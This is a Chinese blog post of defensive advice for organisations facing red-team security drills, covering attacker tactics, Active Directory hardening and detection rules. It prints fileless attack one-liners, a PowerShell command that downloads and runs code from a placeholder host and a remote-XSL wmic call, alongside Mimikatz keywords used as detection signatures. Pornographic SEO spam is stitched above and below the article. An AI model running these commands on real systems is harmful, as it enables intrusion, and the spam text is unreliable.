在线免费观看麻豆_国产+日韩+欧美_欧美色插_国产无限免费av在线播放_夜色阁亚洲一区二区三区_亚洲男女羞羞无遮挡久久丫

復(fù)檢滲透測試網(wǎng)站安全攻守項(xiàng)目分析
  • 更新時(shí)間:2025-05-04 21:48:41
  • 開發(fā)經(jīng)驗(yàn)
  • 發(fā)布時(shí)間:3年前
  • 666

最近我們Sinesafe參加的幾家機(jī)構(gòu)的滲透測試防守方防護(hù)方案評(píng)估復(fù)查,部分防守方缺乏對(duì)攻擊者的正確認(rèn)知,攻擊者的手法已經(jīng)比較高超了,不掃描,不落地,污染日志等都很普及了。同時(shí)也要正確認(rèn)知對(duì)手:攻防演練中,攻擊者并非無所不能,他們面臨著和防御方一樣的問題:時(shí)間緊,任務(wù)重。所以攻擊者的攻擊目標(biāo),攻擊手法也是有跡可循的,知己知彼才能百戰(zhàn)百勝。


滲透測試

一、知彼

攻擊者也是講成本的,因此防守方最好的策略是:做的比其他防守方好一點(diǎn)點(diǎn)即可。好一點(diǎn)的含義:不在低級(jí)問題上犯錯(cuò)(弱密碼、互聯(lián)網(wǎng)應(yīng)用遠(yuǎn)程RCE、管理后臺(tái)暴露、重要服務(wù)器未打補(bǔ)丁等)。對(duì)于“時(shí)間緊、任務(wù)重”的防守方來說,修建固若金湯的防線顯然意味著大成本投入,以及最緊缺的時(shí)間,因此本文不會(huì)面面俱到,只選擇性價(jià)比高值得快速投入的安全措施和大家分享。


攻擊者一般:目標(biāo)明確、步驟清晰、控制成本、反檢測,反清理、三流分立。

目標(biāo)明確:攻擊者只攻擊得分項(xiàng),和必要路徑(外網(wǎng)入口,內(nèi)網(wǎng)立足點(diǎn)),對(duì)這些目標(biāo)采取高等級(jí)手段,會(huì)隱蔽操作;對(duì)非必要路徑順路控制下來的服務(wù)器,并不怕被發(fā)現(xiàn),用起來比較隨意,甚至主動(dòng)制造噪音,干擾防守方。


步驟清晰:信息收集-控制入口-橫向移動(dòng)-維持權(quán)限-攻擊目標(biāo)系統(tǒng)。每一步都是經(jīng)典操作和教科書式手法。


控制成本:

優(yōu)先攻擊高權(quán)限賬號(hào),如管理員,目標(biāo)系統(tǒng)負(fù)責(zé)人賬號(hào);

優(yōu)先攻擊運(yùn)維/安全人員賬號(hào)和終端,這些人往往有服務(wù)器root賬號(hào),安全設(shè)備管理員賬號(hào),可以進(jìn)一步深入控制;

優(yōu)先攻擊集中管控設(shè)施,如域控,集中身份認(rèn)證系統(tǒng),終端管理系統(tǒng),攻陷單系統(tǒng)即獲得公司內(nèi)大部分系統(tǒng)的權(quán)限;

優(yōu)先攻擊基礎(chǔ)設(shè)施,如DNS,DHCP,郵件系統(tǒng),知識(shí)分享平臺(tái),oa系統(tǒng),工單系統(tǒng);這些系統(tǒng)有內(nèi)置高權(quán)限賬號(hào),或可以幫助攻擊者隱蔽痕跡。或Git/SVN等開發(fā)源代碼管理服務(wù)器,通過代碼審計(jì)發(fā)現(xiàn)應(yīng)用0day漏洞。


反檢測,反清理:

樣本隱蔽技術(shù)(白利用(帶微軟簽名的程序執(zhí)行未簽名的黑dll),樣本不落地執(zhí)行(從網(wǎng)上加載樣本,只運(yùn)行在內(nèi)存,不落盤不驚動(dòng)殺軟));


快速擴(kuò)散(攻擊者會(huì)將攻擊包做成自動(dòng)化工具,降低人力投入,快速控制一批有漏洞發(fā)服務(wù)器);


停止日志外發(fā),日志清除(腳本優(yōu)先停止常見日志外發(fā)工具;同時(shí)有開源自動(dòng)化工具來劫持日志產(chǎn)生的進(jìn)程,使得系統(tǒng)不產(chǎn)生日志;使用完后刪除access.log等日志);

減少掃描,通過分析日志、分析配置文件、管理員來源IP等方式來獲取內(nèi)網(wǎng)的其他機(jī)器IP信息,而不是掃描。


點(diǎn)擊添加圖片描述(最多60個(gè)字)

三流分立:

掃描流:用來大批量掃描內(nèi)網(wǎng)存活I(lǐng)P和漏洞,掃描源通常不被攻擊者重視,被清除也不會(huì)影響到攻擊計(jì)劃,高水平攻擊者通常使用掃描行為來分散防守方精力。


數(shù)據(jù)流:用來向外網(wǎng)大量傳輸非關(guān)鍵數(shù)據(jù),通常是有互聯(lián)網(wǎng)權(quán)限的終端或服務(wù)器(終端較多),很少有隧道行為或掃描行為,通過簡單的https,sftp方式傳輸數(shù)據(jù)

控制流:用于接受和傳遞遠(yuǎn)控指令的服務(wù)器,攻擊者最重視的設(shè)施,使用起來最為謹(jǐn)慎,和遠(yuǎn)控中心進(jìn)行交流,常用組件cobaltstrike, empire;有隧道行為,且數(shù)據(jù)傳輸量很少,會(huì)連接若干個(gè)IP和域名(避免外網(wǎng)封禁),傳輸必定加密,不使用自簽名證書。


在本次攻防實(shí)戰(zhàn)演習(xí)準(zhǔn)備階段,攻擊方準(zhǔn)備了幾十個(gè)C2域名。


二、知己知己,主要是知曉防守方防守區(qū)域內(nèi)的資產(chǎn)信息,縮小暴露面。原則如下:

不用的系統(tǒng),該下的下,該暫停的暫停。不用的功能,該下的下,該暫停的暫停。(平時(shí)就應(yīng)該這樣處理,而不是戰(zhàn)時(shí))


該取消訪問的取消,能限制訪問范圍的限制訪問范圍。

在用的,搞清楚功能,雙流(數(shù)據(jù)流和運(yùn)維流)誰用,有沒有風(fēng)險(xiǎn),能否一鍵處置。縮小暴露面 1.按資產(chǎn)所屬緯度梳理互聯(lián)網(wǎng)資產(chǎn)、分支機(jī)構(gòu)資產(chǎn)、子公司資產(chǎn)、外聯(lián)公司資產(chǎn)、公有云資產(chǎn)、開發(fā)商、外包商。


容易忽視的:

公有云資產(chǎn),因?yàn)橛械臉I(yè)務(wù)部門和分支機(jī)構(gòu)公有云申請(qǐng)都不經(jīng)過IT部門,上面卻放了大量業(yè)務(wù)數(shù)據(jù)。


開發(fā)商/外包商的資產(chǎn)。開發(fā)商/外包商一般給甲方外包開發(fā)信息系統(tǒng),開發(fā)商/外包商公司內(nèi)部也會(huì)自建Git/SVN等源代碼管理服務(wù)器,存有已經(jīng)交付給甲方的信息系統(tǒng)源碼,而開發(fā)商/外包商的源碼系統(tǒng)管理安全能力和甲方相比可能就差幾個(gè)量級(jí)了。后果就是:通過獲得的源碼,發(fā)現(xiàn)系統(tǒng)應(yīng)用0day,從而控制甲方已上線信息系統(tǒng)。


縮小暴露面 2.按資產(chǎn)屬性梳理

特別關(guān)注資產(chǎn)的安全屬性:中間件或框架(版本)、開放在公網(wǎng)API接口(特別是未下線的老接口)、管理后臺(tái)開放在公網(wǎng)、高危功能(文件上傳點(diǎn)、短信驗(yàn)證碼、重置密碼、文件下載)、遠(yuǎn)程接入點(diǎn)(VPN)、特權(quán)賬戶(應(yīng)用管理特權(quán)賬戶、應(yīng)用連接賬戶、系統(tǒng)管理特權(quán)賬戶、可以修改賬戶權(quán)限的賬戶、備份賬戶、高管層賬戶)。

每一個(gè)安全屬性都是血的教訓(xùn)。


縮小暴露面 3.忽視點(diǎn)

所有內(nèi)部文檔服務(wù)器上(含OA、郵件系統(tǒng)、jira、wiki、知識(shí)庫等)敏感信息清理或限制訪問權(quán)限,不要有:網(wǎng)絡(luò)拓?fù)洹踩雷o(hù)方案和部署位置、各類密碼;

資產(chǎn)管理平臺(tái)上,蜜罐不要叫蜜罐、安全設(shè)備IP要隱藏;


各類口令:弱口令、默認(rèn)口令、已泄露口令。


每一個(gè)忽視點(diǎn)都是眼淚的結(jié)晶。


安全資產(chǎn)管理,更多內(nèi)容參加:安全資產(chǎn)管理中容易被忽視的幾點(diǎn)


三、防護(hù)關(guān)鍵點(diǎn)


臨戰(zhàn)前,再想按照大而全的梳理一遍,幾無可能,最好就是把防護(hù)關(guān)鍵點(diǎn)過一遍,切記都實(shí)際看一遍,不要相信別人的反饋。


3.1 安全隔離

滲透測試?yán)@過

從實(shí)戰(zhàn)來看,網(wǎng)絡(luò)層的訪問控制被證明是最有效的(攻擊者很難繞過去),不要相信應(yīng)用層控制。網(wǎng)絡(luò)層訪問控制屬于基礎(chǔ)架構(gòu)安全,這是最有效最重要的,整個(gè)安全防護(hù)的基礎(chǔ)。

訪問控制策略原則:明細(xì)允許,默認(rèn)拒絕。

從內(nèi)網(wǎng)去互聯(lián)網(wǎng)的訪問控制

辦公終端:除個(gè)別協(xié)議無法限制目的IP外,其余協(xié)議全部限制。特殊訪問需求,快速開通。有條件的考慮:終端不能直接訪問互聯(lián)網(wǎng),需要訪問互聯(lián)網(wǎng)的兩種解決方案:另外分配一臺(tái)上網(wǎng)終端、虛擬瀏覽器

辦公服務(wù)器:特殊訪問需求開通,默認(rèn)拒絕

生產(chǎn)網(wǎng):生產(chǎn)網(wǎng)終端禁止上互聯(lián)網(wǎng)、服務(wù)器特殊訪問需求開通,默認(rèn)拒絕


2.互聯(lián)網(wǎng)訪問內(nèi)網(wǎng):對(duì)互聯(lián)網(wǎng)提供服務(wù)的服務(wù)器必須在DMZ,和內(nèi)網(wǎng)隔離。


3.重要系統(tǒng)的訪問控制策略

基礎(chǔ)設(shè)施如AD、郵件系統(tǒng)的訪問控制。

別小看基礎(chǔ)設(shè)施ACL訪問控制,這是對(duì)抗應(yīng)用和系統(tǒng)漏洞的最低成本和最有效措施。漏洞層出不窮,唯有ACL訪問控制藥效持久,強(qiáng)烈推薦。

終端安全管控、自動(dòng)化運(yùn)維系統(tǒng)等集中控制系統(tǒng)后臺(tái)登錄限制訪問來源。(優(yōu)先使用網(wǎng)絡(luò)訪問控制、其次使用系統(tǒng)層限制、搭配使用應(yīng)用層限制)


3.2 AD防護(hù)

準(zhǔn)備階段

2.加固階段

對(duì)抗權(quán)限提升:對(duì)域賬號(hào)進(jìn)行權(quán)限D(zhuǎn)ACL梳理,加固高權(quán)限賬號(hào)

檢測高權(quán)限賬號(hào)可以用bloodhound黑客工具監(jiān)測,也可以通過System Internal Tools的ADExplorer來進(jìn)行檢測:

1)修改密碼(建議在演習(xí)前臨近時(shí)間進(jìn)行修改)

2)調(diào)整權(quán)限和分組,根據(jù)賬號(hào)的歸屬人的權(quán)限進(jìn)行調(diào)賬,取消非域管賬號(hào)的敏感權(quán)限。

3)修改分組內(nèi)的不合適的人員賬號(hào)。

4)敏感賬號(hào)不允許委派。

5)敏感賬號(hào)不允許取消Kerberos預(yù)鑒權(quán)。

6)敏感賬號(hào)的密碼強(qiáng)度符合規(guī)定。

7)具備直接域管或者間接域管權(quán)限(例如可以修改Domain Admins的賬號(hào)就具備間接域管權(quán)限)的賬號(hào)的活動(dòng)進(jìn)行報(bào)備制度,演習(xí)期間未經(jīng)允許不得進(jìn)行任何操作,包括登錄等等。

8)辦公機(jī)和終端演習(xí)前全部重啟,消除敏感賬號(hào)憑據(jù)留存。

9)服務(wù)器登錄查看相關(guān)憑據(jù),如果有刪除或通過注銷來刪除服務(wù)器上留存的憑據(jù)。

10)參照https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-f--securing-domain-admins-groups-in-active-directory配置域管理員權(quán)限。

對(duì)抗攻擊者使用MS14-068,MS17-010攻擊域:從舊到新依次安裝DC上的windows補(bǔ)丁。

對(duì)抗攻擊者使用ExchangeSSRF漏洞:從舊到新依次安裝Exchange上的windows補(bǔ)丁。

對(duì)抗LDAP relay攻擊:在域控上配置LDAP enforce signing。

對(duì)抗LDAP relay和SSRF攻擊:在域控上配置LDAPS channel binding。

對(duì)抗LLMNR/NBT Poisoning攻擊:關(guān)閉域內(nèi)WPAD服務(wù)。



3.檢測階段

滲透測試檢測階段

原則:若域不安全,最佳修復(fù)方案是重裝。

檢測敏感共享目錄訪問:訪問了AD服務(wù)器的非正常共享目錄 (非SYSVOL文件夾)

檢測mimikatz一系列攻擊行為:

Mimikatz通過sysmon進(jìn)程來進(jìn)行檢測,常見關(guān)鍵字有“gentilkiwi (Benjamin DELPY)”(公司名稱)、

其他關(guān)鍵字:kerberos::golden sekurlsa::pth kerberos::ptt lsadump::dcshadow lsadump::dcsync sekurlsa::logonpasswords privilege::debug misc::skeleton

檢測Kerberos弱加密方式:非AES加密方式的Kerberos票據(jù)加密請(qǐng)求相當(dāng)可疑

檢測異常注冊(cè)表變更和dump:DSRMAdminLogonBehavior

變更AdminSDHolder

導(dǎo)出HKLM\SAM內(nèi)容

導(dǎo)出HKLM\SYSTEM內(nèi)容

導(dǎo)出HKLM\SECURITY內(nèi)容

檢測ntdsutil濫用:使用了ntdsutil的敏感參數(shù)activate instance ntds ;使用了ntdsutil的敏感參數(shù)set dsrm password

檢測SID history變更:賬號(hào)加入SID History成功、失敗

檢測lazagne密碼提取工具:特征 lazagne

攻擊者喜歡用的其他工具:

procdump、PsExec、cain、Mshta、cmstp、QuarkPwDump、getpass、gethash、ntdsdump、Get-PassHashes、Wce、psaattack。

3.3 主機(jī)防護(hù)(終端和服務(wù)器)對(duì)抗攻擊者在嘗試控制終端和服務(wù)器時(shí),為了繞過常規(guī)的殺毒軟件,通常會(huì)使用一些免殺手段。而某些免殺手段(如白利用,樣本不落地執(zhí)行)由于非常穩(wěn)定和高效,更是受到廣大攻擊者的青睞。


1.Powershell IEX組建下載執(zhí)行.(文件在內(nèi)存執(zhí)行,不落硬盤)

利用代碼示例:powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa'))">

監(jiān)測特征:"IEX” AND “(New-Object Net.WebClient).DownloadString“

2.Windows系統(tǒng)白文件利用(wmic.exe

利用代碼示例:cmd/c wmic os get /format:”\\x.x.x.x\1.xsl”&start/wait notepad

監(jiān)測特征:"wmic os get" AND "/format"3.Windows系統(tǒng)白文件利用(csc.exe)

利用代碼示例:

"C:/Windows/Microsoft.NET/Framework64/v2.0.50727/csc.exe"/noconfig /fullpaths@"C:/Users/a/AppData/Local/Temp/l1xso2zu.cmdline"

監(jiān)測特征:"csc.exe" AND ("/r:System.EnterpriseServices.dll"OR "/unsafe")4.Windows系統(tǒng)白文件利用(msiexec.exe)

特征:被動(dòng)執(zhí)行后臺(tái)執(zhí)行的參數(shù),有一定誤報(bào)率。請(qǐng)自行研究,不再舉例。

5.檢測certutil白利用

特征:常見繞防火墻使用的參數(shù)。請(qǐng)自行研究,不再舉例。

6.檢測通過url.dll來進(jìn)行不落地執(zhí)行

請(qǐng)自行研究,不再舉例。


3.4 賬戶和權(quán)限對(duì)抗

高權(quán)限一律清理,限制使用范圍,每次使用后確認(rèn)。

應(yīng)用權(quán)限通過日志分析檢測濫用。

關(guān)注備份賬戶、可修改權(quán)限賬戶的使用。

終端24小時(shí)重啟一次。(對(duì)抗終端權(quán)限抓取類攻擊)


3.5 瞬間死亡

瞬間死亡有兩種方式:路徑打穿、系統(tǒng)打穿。


3.5.1 路徑打穿

直接從未想過(未設(shè)防)的路徑攻擊過來。郵件是控制終端第一選擇入口,具體防護(hù)可參見《企業(yè)安全建設(shè)指南:金融行業(yè)安全架構(gòu)與技術(shù)時(shí)間》第16章:郵件安全。

邊緣網(wǎng)包括無線和自助終端,包括:打卡機(jī)、自動(dòng)售賣機(jī)、會(huì)議室設(shè)備、ATM機(jī)、排隊(duì)機(jī)等。限制無線和自助終端網(wǎng)絡(luò)和內(nèi)網(wǎng)訪問。

限制分支機(jī)構(gòu)、外聯(lián)公司等網(wǎng)絡(luò)和總部的網(wǎng)絡(luò)訪問。

不要相信理論上不能全通,但實(shí)際上存在全通內(nèi)網(wǎng)的系統(tǒng)。(死于方便性)


3.5.2 系統(tǒng)打穿

系統(tǒng)打穿,都是血淚史。因?yàn)槲覀兛偸峭浟诉@些最大的風(fēng)險(xiǎn)源。優(yōu)先攻擊中心化的系統(tǒng)和跨兩網(wǎng)的系統(tǒng),包括終端安全管控控制臺(tái)(控制臺(tái)安全防護(hù)能力很弱)、運(yùn)維管理系統(tǒng)/Zabbix/Nagios/堡壘機(jī)等、單點(diǎn)登錄SSO系統(tǒng)、AD活動(dòng)目錄;

優(yōu)先攻擊基礎(chǔ)設(shè)施:DNS、DHCP、郵件系統(tǒng)、研發(fā)服務(wù)器SVN/Git;


高價(jià)值終端:


網(wǎng)絡(luò)管理員:終端內(nèi)有網(wǎng)絡(luò)拓?fù)浜虯CL控制策略,甚至可以修改訪問控制;

安全管理員:有安全防護(hù)方案和檢測系統(tǒng)、告警系統(tǒng)登錄權(quán)限,很多安全系統(tǒng)做了登錄來源限制,繞過手段之一就是控制安全管理員的終端,同時(shí)抓取安全管理員賬戶密碼,攻擊者一舉兩得;


研發(fā)個(gè)人終端/運(yùn)維個(gè)人終端:高價(jià)值數(shù)據(jù);


內(nèi)網(wǎng)掃描器:網(wǎng)絡(luò)權(quán)限較大,哪都能去。


代碼服務(wù)器:代碼數(shù)據(jù)價(jià)值比較高。私有協(xié)議開發(fā)的應(yīng)用程序,源碼要保護(hù)好,有經(jīng)驗(yàn)攻擊團(tuán)隊(duì)帶代碼審計(jì)技能成員,通過源碼審計(jì)發(fā)現(xiàn)應(yīng)用0day

3.6 容易出問題的點(diǎn)

互聯(lián)網(wǎng)應(yīng)用框架RCE

應(yīng)用和中間件管理后臺(tái)暴露

VPN:未啟用雙因素,或存在未啟用雙因素的部分用戶

測試環(huán)境的測試系統(tǒng)未及時(shí)打補(bǔ)丁、弱密碼

通過郵件入口控制辦公終端

跨兩網(wǎng)的設(shè)備

服務(wù)器密碼同質(zhì)問題


社工

四、事中和事后

前面分享了很多防護(hù)和檢測的事項(xiàng),但防守方到了這個(gè)階段,更重要的是考慮一下事中的各種過載信息的研判和快速應(yīng)急處置措施。我們打內(nèi)部攻防演習(xí)的時(shí)候,最大的困擾是決策和處置。


4.1 過載信息研判

有效高速的決策機(jī)制,什么權(quán)限范圍內(nèi)的由什么人決策,這是授權(quán)。


什么崗位(人)負(fù)責(zé)什么,這是職責(zé)劃分。比如誰負(fù)責(zé)跟蹤每條告警信息到Closed狀態(tài)?誰負(fù)責(zé)斷網(wǎng)?誰負(fù)責(zé)樣本分析?誰負(fù)責(zé)失陷主機(jī)排查?誰負(fù)責(zé)溯源路徑?誰負(fù)責(zé)記錄?誰負(fù)責(zé)匯報(bào)?等等。


4.2 快速應(yīng)急處置

4.2.1 硬件和后勤

大的作戰(zhàn)室,容納全部防守隊(duì)伍;

好的白板(最好電子的),便于梳理攻擊路徑;

準(zhǔn)備好零食和一日三餐、行軍床。

4.2.2 重要信息同步

已經(jīng)淪陷的IP清單(黑名單),同步給所有防守方;

是否C2域名快速判斷,注意真假難辨的域名。


4.2.3 各類應(yīng)急處置措施

斷網(wǎng):快速斷網(wǎng)的操作規(guī)范和自動(dòng)化工具

誘餌

臨時(shí)添加ACL和FW規(guī)則

下線業(yè)務(wù):和業(yè)務(wù)方建立暢通的溝通機(jī)制和快速的決策機(jī)制

如果失陷(疑似)主機(jī),決策用于誘餌,務(wù)必確保誘餌的風(fēng)險(xiǎn)可控,萬一持續(xù)利用誘餌在內(nèi)網(wǎng)橫向移動(dòng),再進(jìn)行限制就困難了。

注意體力分配,高水平攻擊者通常使用掃描行為等方式來分散防守方精力。

4.3 滲透測試復(fù)檢

攻防實(shí)戰(zhàn)演習(xí)后的總結(jié)改進(jìn)提升,才是最終目的。

4.3.1 防護(hù)薄弱點(diǎn)和改進(jìn)措施

安全團(tuán)隊(duì)

協(xié)作團(tuán)隊(duì)

廠商和第三方

安全團(tuán)隊(duì)不好推動(dòng)的工作,不好講的話,要不到的資源,都可以在這里提出來。

應(yīng)急處置薄弱點(diǎn)和改進(jìn)措施,落實(shí)到人、計(jì)劃和資源中,才是務(wù)實(shí)的。


4.3.3 資源不足,要資源

安全運(yùn)營是必由之路,參見 金融業(yè)企業(yè)安全建設(shè)之路

7*24小時(shí)的安全運(yùn)營,既然攻擊對(duì)手是7*24小時(shí)的,為什么安全運(yùn)營不是呢?

4.3.4 必要的管理層匯報(bào)


五、注意事項(xiàng)

不要影響業(yè)務(wù)。攻防演習(xí)前的加固,需要妥善評(píng)估對(duì)業(yè)務(wù)可用性影響,攻防演習(xí)中的應(yīng)急處置,需要妥善評(píng)估對(duì)業(yè)務(wù)可用性影響,畢竟,業(yè)務(wù)可用性才是老大,安全不是,擺正心態(tài)和位置,如果對(duì)滲透測試有想法的朋友可以找專業(yè)的網(wǎng)站安全公司來處理解決,國內(nèi)推薦Sinesafe,綠盟,啟明星辰,等等的網(wǎng)站安全公司。

我們專注高端建站,小程序開發(fā)、軟件系統(tǒng)定制開發(fā)、BUG修復(fù)、物聯(lián)網(wǎng)開發(fā)、各類API接口對(duì)接開發(fā)等。十余年開發(fā)經(jīng)驗(yàn),每一個(gè)項(xiàng)目承諾做到滿意為止,多一次對(duì)比,一定讓您多一份收獲!

本文章出于推來客官網(wǎng),轉(zhuǎn)載請(qǐng)表明原文地址:https://www.tlkjt.com/experience/7603.html
推薦文章

在線客服

掃碼聯(lián)系客服

3985758

回到頂部

主站蜘蛛池模板: 一般男女モニタリングav_大地影院高清mv在线观看_在线国产一区二区_久久无码中文字幕东京热_国产精品视频一区二区三区四蜜臂_新呦u视频一区二区_中文字幕一二三_中文字幕一级毛片无码视频 | 好男人在线影院官网WWW_漂亮人妻被强中文字幕久久_公和熄小婷乱中文字幕_CHESE老妇MON熟女_日色视频_一级黄色在线播放_特级bbbbbbbbb视频_亚洲精品久久久久国产 | 99在线免费观看_亚洲一区二区无码偷拍_很很鲁很很很鲁在线视频播放_免费成人网在线观看_91av视频网站_厨房挺进紧致班主任少妇_特警新人类国语免费高清在线观看_日韩中文在线 | 又黄又爽的成人免费视频_caopeng在线_国产精品自在线_亚洲精品美女久久久久久久久久_久久久久久国产精品免费_中国wwwxxxx_精品国产天堂_成年女人午夜毛片免费视频 | 嫩草黄色_69视频在线播放_亚洲精品mv在线观看_波多野结衣AV最新作品在线观看_国产视频精品视频_欧美肥婆丰满bbw_成人免费网视频_亚洲日本中文字幕网站 | 国产无套乱子伦精彩是白视频_成人精品动漫_精品人妻系列无码专区久久_秋霞无码一区二区_九九re热_japanese教师中文字幕_大地资源在线观看免费官网_成人九九视频 | 5g国产精品影院天天5g天天爽_欧美又大又粗无码视频_国产综合色一区二区三区_天天爽天天_九九精品在线视频_色片免费在线观看_国产精品一区二区三区不卡_久久久久久久一区 | 午夜男女爽爽影院免费视频_国产成一区二区_日韩视频第一区_亚洲韩日精品_26uuu久久综合_亚洲综合国产一区二区三区_免费中文字幕日韩_九九热免费在线 | 国产a级片免费_亚洲国产成人高清在线观看_ww国产内射精品后入国产_天天爽夜夜爱_亚洲三区在线观看_国偷自产av一区二区三区麻豆_国产精品日韩久久久_日韩中字在线观看 | 久久久久久久久久97_午夜精华_国产精品一区二区国产主播_91免费网站视频_亚洲精品久日韩_午夜女人a毛片免费观看_在线观看欧美日韩_色自拍 | 18勿入网站免费永久_91色综合网_国产欧美在_女人体1963毛片a级_久久久老熟女一区二区三区_亚洲依依成人亚洲社区_激情爱爱网站_中国XXXX真实偷拍 | 成人精品毛片_伦理一区二区_神马久久免费_精品欧美一区二区久久久伦_亚洲二级片_91久久网_freeXXXX国产HD中文对白_18禁黄网站禁片免费观看不卡 | 四虎影院永久地址_亚洲高清在线_欧美孕妇变态孕交粗暴_日韩国产黄色_麻豆蜜桃91_日韩高清一区_婷婷色中文字幕综合在线_91九色欧美 | 96久久久久久_男女啪啪永久免费网站_亚洲爆乳AAA无码专区_成人国产精品一区二区_久久久情_国内精自视频品线六区免费_大地资源在线资源免费观看_精品成人免费国产片 | 国产乱理伦片a级在线观看_精品国产一区二区三区观看不卡_久久精品道一区二区三区_日本牲交大片无遮挡_中文字幕区一区二_爱色av网站_三级全黄做爰_四虎影视成人永久免费观看视频 | 黄色在线观看污_暴力强奷在线播放无码_www.九九精品_色免费在线观看_www麻豆_公侵犯美丽人妻HD_xxxwww高潮视频hd_国产成人精选在线不卡 | 特黄A片女人亚洲一区小说_尻逼久久_美国豪放女大兵在线观看_精品国产91久久久_成人免费在线视频观看_国产精品美女久久久久av爽金牛_亚洲成人tv_久久久久久中文字幕 | 日韩视频在线第一页_欧美黑人欧美黑人双交_在线99_亚洲伊人成人_久久人人爽人人人人片_人妻人人澡人人添人人爽人人玩_久久香蕉99_天天看国91产在线精品福利桃色 | www.伊人_中国农村自拍HDXXXX_亚洲午夜久久久精品一区二区三剧_人人成人_久久久精品人妻久久影视_国产激情内射在线影院_同性男男黄G片免费网站_精品国产第一区二区三区的区别 | 国产在线一区二区三区在线_日韩国产精品一区_5566在线视频_不卡亚洲_无码人妻丰满熟妇区五十路百度_xxxxx性开放_法国性迷宫_日韩中文字幕在线不卡 | 91嫩草国产线免费观看_欧美日产亚洲国产精品_国产视频午夜_成人永久免费网站在线观看_逼逼操操_国产精品国产精品不卡_国产98色在线_亚洲精品一区国产精品 男人j桶进女人p无遮挡免费的视频_亚洲kkk4444在线观看_极品少妇被啪到呻吟喷水_国产精品臀控福利在线观看_97视频国产自在自线2020_视频h在线_国产成人午夜福利r在线观看观看_午夜福利啪啪片 | 久久免费资源_gratisvideos另类灌满_97偷自拍亚洲综合二区_国产女人啪啪_在线免费看a_日本公妇被公侵犯中文字幕2_精品自拍农村熟女少妇图片_中文字幕乱偷无码动漫av | 亚洲三级毛片_91超在线_久久久久久久久久艹_天天操中文字幕_japanese老熟妇乱子伦视频_国产在线视频欧美_精品一区日韩_国产日韩欧美综合在线 | 亚洲日本国产精品_国产精品美女久久久久久2022_97免费人妻视在线视频首页_蜜芽亚洲AV无码精品国产午夜_亚洲αv在线_在线视频91国产_日韩一区二区三区久久香蕉_jizz成熟丰满韩国少妇在线 | 奇米777官网_免费99精品国产自在在线_国产精品WWW夜色视频_国产美女无遮挡免费_9999视频_特级做爰片毛片免费看小说_国产白浆二区二区精品视频_欧美成人黑人xx视频免费观看 | 久久久久高清视频_52avaⅴ我爱haose免费视频_亚洲日韩成人性av网站_黄色影视免费看_JVID亚洲精品无圣光图套_久久国产欧美一区二区精品爱欲_国产精品96久久久久久久_亚洲天堂区 | 国产a级片免费_亚洲国产成人高清在线观看_ww国产内射精品后入国产_天天爽夜夜爱_亚洲三区在线观看_国偷自产av一区二区三区麻豆_国产精品日韩久久久_日韩中字在线观看 | 波萝蜜A毛黄AAA片_国产高清在线精品_久久久视频免费观看_欧美一区二区三区性视频_免费无码成人av在线播_91av国产在线_亚洲第一AAAAA片_米奇777在线观看 | 天堂中文字幕在线_欧美最猛性xxxxx(亚洲精品)_99不卡视频_性欧美丰满熟妇XXXX性_国产乱码卡二卡三卡4_欧美性一级_国产精品一区二区无线_国产美女爆乳呻吟视频 | 少妇高潮太爽了在线视频_波多野结衣无码视频在线观看_欧美精品momssexxxx_美女被强遭的免费网站视频_久久国产精品视频免费看_亚洲精品高清国产一线久久_高清三区_91综合在线视频 | 精品在免费线_天天综合色网_成人福利一区二区_aaa毛片视频免费观看_国产亚洲另类久久久精品_男人大臿蕉香蕉大视频_baoyu135国产精品免费_国产精品自在拍在线播放 | 97偷拍在线视频_国产自一区_天天做天天爱天天操_国产女人视频在线观看_久久久久久久av麻豆果冻_色婷婷综合久色_av超碰在线观看_男人女人真曰批视频播放在线 | 成人做爰高潮片免费视频韩国_欧美一级黄色免费_日韩欧美一级片_超碰国产91_亚洲av无码专区亚洲av不卡_亚洲爱爱小视频_久久综合九色综合欧美就去吻_在线观看免费人成视频色9 | 琪琪的色原网站_av毛片在线_欧美精品日韩在线_日韩一级网_91caoporn超碰_欧美一级毛片ⅹxx_成人免费av片在线观看_三级毛片子 | 中文字幕视频在线免费观看_欧美黑人巨大久久久精品一区小蓝_欧洲日韩一区二区_精品久久久久久中文字国产_18禁免费无码无遮网站国产_手机色网_啪免费视频_欧洲国产精品精华液 | 少妇无内裤下蹲露大唇_人人草人人射_日本福利小视频_97精产国品一二三产区_成人免费网站在线观看视频_2023天天射天天干_狠狠爱亚洲综合久久_黄色成年网站 | 久久久亚洲欧洲日产国码二区_在线看片无码永久免费aⅴ_一级草逼片_91精品播放_毛片视频在线免费观看_91伊人影院_成人免费色_av色久 | 日韩在线aaa_jizzyou中国少妇高潮_久久久综合亚洲色一区二区三区_免费看黄片毛片_久久千人斩_在线播放的av_少妇性饥渴姓交HDSEX_亚洲VA中文字幕无码毛片 | 人人妻人人澡人人爽欧美一在内谢_亚洲成aⅴ人片久青草影院_亚洲AV无码一区东京热蜜芽_性刺激久久久久久久久九色_一級特黃色毛片免費看_免费看无码特级毛片_日本成人免费在线_国产福利日本一区二区三区 | 国产精品xxxx18a99_亚洲三级片福利视频_少妇性BBB搡BBB爽爽爽视頻_久久久aa裸体视频_激情小说另类小说亚洲欧美_国产精品久久久久久av公交车_色视频成人在线观看免_夫妻午夜视频 | 色性导航_欧美一区二区三区的_成人一区视频_91网站免费入口_国产精品外围在线观看_亚洲色无码播放_4虎最新网址_成人在线观看免费高清 |